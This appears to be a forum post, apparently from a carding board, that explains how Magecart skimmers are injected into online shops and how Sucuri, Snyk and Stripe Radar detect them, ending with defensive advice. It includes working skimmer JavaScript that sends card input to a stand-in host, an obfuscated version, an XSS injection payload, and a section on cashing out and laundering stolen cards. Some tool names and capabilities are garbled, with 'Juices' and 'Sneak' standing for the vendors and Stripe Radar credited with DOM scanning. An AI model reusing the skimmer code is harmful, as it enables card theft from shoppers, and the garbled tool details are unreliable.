How web skimmers (Magecart attacks) work and how are they detected?

[Mutt]

Web skimmers, such as Magecart attacks, are one of the key techniques used in carding, a criminal activity aimed at stealing credit card data for subsequent use in fraudulent transactions. In this answer, I will go into detail about how attackers inject malicious JavaScript code into online shopping sites, how it works to steal card data, and how security systems (Sucuri, Snyk, Stripe Radar) detect such attacks through DOM, CSP, and suspicious traffic analysis. The answer will be educational, with a focus on technical details and defense methods to help better understand the threat and how to counter it.

How Web Skimmers Work in the Context of Carding​

1. What is Magecart and carding?​

Magecart is a general term for a group of cybercriminals and their methods of injecting malicious JavaScript scripts (skimmers) into websites, most often online stores, to steal card data. Carding is a broader term that describes the use of stolen card data to make fraudulent purchases, withdraw money, or sell the data on the black market (e.g., the dark web).

The goal of web skimmers is to intercept card data (number, cardholder name, expiration date, CVV) as the user enters it on the payment page. This data is then used by carders to:

• Direct purchases from other stores.
• Creating clones of cards for physical transactions.
• Selling data on shadow forums.

2. How do attackers deploy skimmers?​

Attackers use several methods to inject malicious code into a website. Here are the main approaches:

• Compromise of the website server:
  • CMS Vulnerabilities: Popular platforms like Magento, WordPress, OpenCart are often targeted due to vulnerabilities in their plugins or outdated versions. For example, in 2018, Magento was the target of multiple Magecart attacks due to plugin vulnerabilities.
  • Method: Attackers gain access to the server through exploits (e.g. SQL injections, RCE - Remote Code Execution) and add malicious JavaScript code to the site files (e.g. index.php or footer.php).
  • Example: Embedding <script src=" https://malicious.com/skimmer.js "></script> into a page template.
• Compromise of third-party services:
  • Third-party libraries: Attackers attack popular libraries (e.g. jQuery) or services (analytics, chats, ad networks) that are used by the site.
  • Method: Replacing a legitimate script with a malicious one via a supply chain attack. For example, in 2018, a skimmer was introduced into a library used by British Airways.
  • Example: Replacing <script src=" https://cdn.trusted.com/lib.js "> with a script from an infected CDN.
• Phishing and Credential Theft:
  • Method: Attackers gain access to the site's administrative panel through phishing attacks or brute force. Once logged in, they add malicious code to the template editor.
  • Example: Embedding a script through the WordPress admin panel in the theme editing section.
• Cross-site scripting (XSS):
  • Method: If a site is vulnerable to XSS, attackers inject script via user input (e.g. in comments or forms). Reflected or persistent XSS allows the skimmer to be loaded dynamically.
  • Example: Inserting <script>document.write('<script src=" https://malicious.com/skimmer.js "></script>')</script> through a vulnerable form.
• Supply chains:
  • Method: Attackers attack third-party services, such as ad networks or widgets (such as chatbots) that are integrated into a site. Compromising one service affects all sites that use it.
  • Example: In 2020, a skimmer was implemented through a chat widget used by many stores.

3. How does a skimmer work?​

Once injected, the malicious JavaScript performs the following actions:

• Data collection:
  • The script tracks data entry into forms on the payment page. This is achieved through:
    • Intercepting events (onchange, oninput, onkeyup) on input fields.
    • Using DOM methods such as document.getElementById('card-number') or document.querySelector('input[name="cc"]').
  • Example of skimmer code (simplified, obfuscated in real attacks):
    

    document.getElementById('card-number').addEventListener('input', function(e) {
    let cardData = e.target.value;
    fetch('https://malicious.com/collect', {
    method: 'POST',
    body: JSON.stringify({ card: cardData })
    });
    });

  • Skimmers can collect not only card data, but also additional information: name, address, email, phone number.
• Code obfuscation:
  • To avoid detection, skimmer code is often obfuscated (for example, using tools like JavaScript Obfuscator). An example of obfuscated code:
    

    var _0x1a2b=['value','card-number','getElementById','addEventListener','input','POST','https://malicious.com/collect'];function _0x3c4d(e){let d=document[_0x1a2b[2]](_0x1a2b[1]);d[_0x1a2b[3]](_0x1a2b[4],function(e){fetch(_0x1a2b[6],{method:_0x1a2b[5],body:JSON.stringify({card:e.target[_0x1a2b[0]]})});});}

  • Obfuscation makes it difficult for antivirus and security systems to analyze code.
• Data transfer:
  • The collected data is sent to the attackers' server via:
    • HTTP requests (GET/POST).
    • WebSocket for real time.
    • Legitimate services (eg Google Firebase) for disguise.
  • Data is often Base64 encoded or encrypted to hide its contents.
  • Example request:
    

    POST https://malicious.com/collect
    Body: {"card":"4532015112830366","cvv":"123","name":"John Doe"}

• Avoid detection:
  • Scripts can be loaded dynamically (for example, via document.createElement('script')).
  • Activation only on payment pages or for specific users (e.g. by geolocation).
  • Using domains that are similar to legitimate ones (e.g. g00gle-analytics.com instead of google-analytics.com).

4. Using stolen data in carding​

After the data is stolen, carders:

• Check the validity of cards through small test transactions.
• They use cards to purchase goods (such as electronics) and have them delivered to fictitious addresses.
• They sell data on darknet forums (prices range from $5 to $100 per card depending on the limit and region).
• They conduct transactions through cryptocurrency exchanges to launder funds.

How Systems Detect Web Skimmers​

Security systems such as Sucuri, Snyk, and Stripe Radar use a comprehensive approach to detect Magecart attacks. They analyze the site code, network traffic, and script behavior. Here's a detailed breakdown of the methods:

1. DOM (Document Object Model) Analysis​

• How it works:
  • The DOM is a software representation of a web page, including HTML, CSS, and JavaScript. Skimmers often add or modify DOM elements to intercept data.
  • Security systems scan the DOM for:
    • Unauthorized <script> tags.
    • Dynamically added scripts via document.createElement or document.write.
    • Suspicious functions such as eval(), setInterval, or methods that interact with forms.
  • Signature and behavioral analysis are used:
    • Signature: Searches for known skimmer patterns (e.g. requests to specific domains).
    • Behavioral: Analysis of anomalous behavior such as event hijacking on input fields.
• Examples of tools:
  • Juices:
    • Regularly scans your site's files and DOM, comparing them to a reference version.
    • Detects changes such as the addition of <script src=" https://malicious.com/skimmer.js ">.
    • Uses a database of known skimmers for signature analysis.
  • Sneak:
    • Focuses on analyzing third-party dependencies (e.g. npm packages or CDN scripts).
    • Checks if libraries used by the site have been compromised.
  • Stripe Radar:
    • Analyzes the client-side DOM in real time to detect suspicious changes on checkout pages.
• DOM features:
  • Unknown scripts loaded from external domains.
  • Obfuscated code containing suspicious functions (e.g. atob() for Base64 decoding).
  • Scripts that interact with input fields (e.g. input[name="card_number"]).

2. Content Security Policy (CSP)​

• How it works:
  • CSP is an HTTP header that restricts which domains can load resources (scripts, images, fonts, etc.). An example of a header:
    

    Content-Security-Policy: script-src 'self' https://trusted.com;

  • If the skimmer attempts to load a script from an unauthorized domain (e.g. malicious.com), the browser blocks the request and sends a violation report.
  • Security systems analyze CSP reports to detect attempts to download malicious scripts.
• The role of systems:
  • Juices:
    • Monitors CSP violation reports through a built-in web firewall (WAF).
    • Notifies administrators about attempts to load scripts from unknown domains.
  • Stripe Radar:
    • Integrates with CSP on payment pages, tracking attempts at unauthorized access to data.
  • Sneak:
    • Helps set up strict CSP policies, minimizing the risk of third-party resource compromise.
• Signs:
  • Violation of CSP policy (for example, attempting to load a script from malicious.com).
  • Frequent requests to domains not listed in script-src or connect-src.
  • Attempts to bypass CSP via unsafe methods such as eval().

3. Analysis of suspicious traffic​

• How it works:
  • The systems monitor network requests coming from the site for anomalies:
    • Requests to unknown or suspicious domains.
    • Transferring data in encoded form (e.g. Base64).
    • Unusually high volume of requests from one page.
  • Machine learning algorithms are used to detect anomalous behavior such as submitting form data to third-party servers.
• Examples of tools:
  • Juices:
    • Uses WAF to monitor and block suspicious requests.
    • Analyzes server logs for anomalies such as POST requests to unknown domains.
  • Sneak:
    • Checks network communications of third-party libraries to detect if they send data to suspicious servers.
  • Stripe Radar:
    • Uses machine learning to analyze transactions and traffic.
    • Detects anomalies such as data being sent to a legitimate payment processor and a suspicious server at the same time.
• Signs:
  • HTTP requests to domains unrelated to the site's functionality (e.g. malicious.com instead of stripe.com).
  • Transfer of form data in encoded form (Base64, HEX).
  • Abnormally high frequency of requests from one page.

4. Additional detection methods​

• Static code analysis:
  • Sucuri and Snyk scan website files (HTML, PHP, JS) for malicious code.
  • Check file hashes to detect unauthorized changes.
  • Example: Detecting the line <script src=" https://malicious.com/skimmer.js "> in header.php.
• Behavioral analysis:
  • Stripe Radar analyzes user behavior on the checkout page (for example, abnormally fast actions or repeated requests).
  • Detects attempts at automated data entry, typical for skimmer testing.
• Subresource Integrity (SRI):
  • Used to check the integrity of third-party scripts. Example:
    

    <script src="https://trusted.com/lib.js" integrity="sha256-abc123..."></script>

  • If the script hash does not match, the browser blocks its loading.
• Dependency Monitoring:
  • Snyk analyzes npm packages and CDN resources to detect vulnerabilities or compromises.

Examples of real attacks and their detection​

1. British Airways (2018):
   • Attack: Skimmer was embedded in a third-party library used on the payment page. The script sent card data to the attackers' server.
   • Detection: Anomalous traffic was noticed through server log analysis. CSP violations pointed to an unauthorized domain.
   • Tools: Similar to Sucuri, they could detect changes in the DOM, and Stripe Radar could detect anomalies in transactions.
2. Ticketmaster (2018):
   • Attack: Attackers compromised a third-party chat widget that loaded a skimmer onto payment pages.
   • Detection: Snyk-like tools revealed a vulnerability in a third-party script, and traffic analysis showed data being sent to a suspicious domain.
3. Magento-attacks (2020):
   • Attack: Attackers exploited a vulnerability in a Magento plugin to inject a skimmer into the site's files.
   • Detection: Sucuri detected file changes through static analysis, and CSP reports indicated attempts to load scripts.

How to protect yourself from web skimmers​

To prevent Magecart attacks and protect against carding, it is recommended:

1. Regular scanning:
   • Use Sucuri or Snyk to monitor your site's code and third-party dependencies.
   • Check site files for changes (for example, through hashing).
2. Setting up CSP:
   • Limit script loading to trusted domains only:
     

     Content-Security-Policy: script-src 'self' https://trusted.com; report-uri /csp-report;

   • Enable violation reporting for monitoring.
3. Subresource Integrity (SRI):
   • Check the integrity of third-party scripts using hashes.
4. Software update:
   • Update your CMS, plugins and libraries regularly to eliminate vulnerabilities.
   • Use Snyk for dependency analysis.
5. Web Firewall (WAF):
   • Use Sucuri WAF to block suspicious requests.
   • Set up filters to block traffic to unknown domains.
6. Encryption and tokenization:
   • Use payment processors like Stripe that tokenize card data, minimizing its storage on the site.
   • Stripe Radar can additionally analyze transactions for anomalies.
7. Staff training:
   • Provide training on phishing and credential security.
   • Use complex passwords and two-factor authentication for admin panels.
8. Traffic monitoring:
   • Set up monitoring systems (such as Sucuri or Stripe Radar) to analyze outgoing traffic.
   • Use SIEM systems to correlate events.

Conclusion​

Web skimmers like Magecart pose a serious threat to online stores, allowing carders to steal card data and use it for fraudulent purposes. Attackers inject malicious JavaScript through vulnerabilities in servers, third-party services, or XSS, intercepting form data and sending it to their servers. Systems like Sucuri, Snyk, and Stripe Radar effectively detect such attacks through DOM analysis, CSP, and traffic monitoring using signature, behavioral, and machine learning approaches.

To protect against this, it is important to implement a multi-layered strategy: updating software, using CSP and SRI, monitoring code and traffic, and minimizing card data storage. If you want to dive deeper into specific aspects (e.g. obfuscated code examples, CSP setup, or log analysis), let me know and I will provide additional details or examples!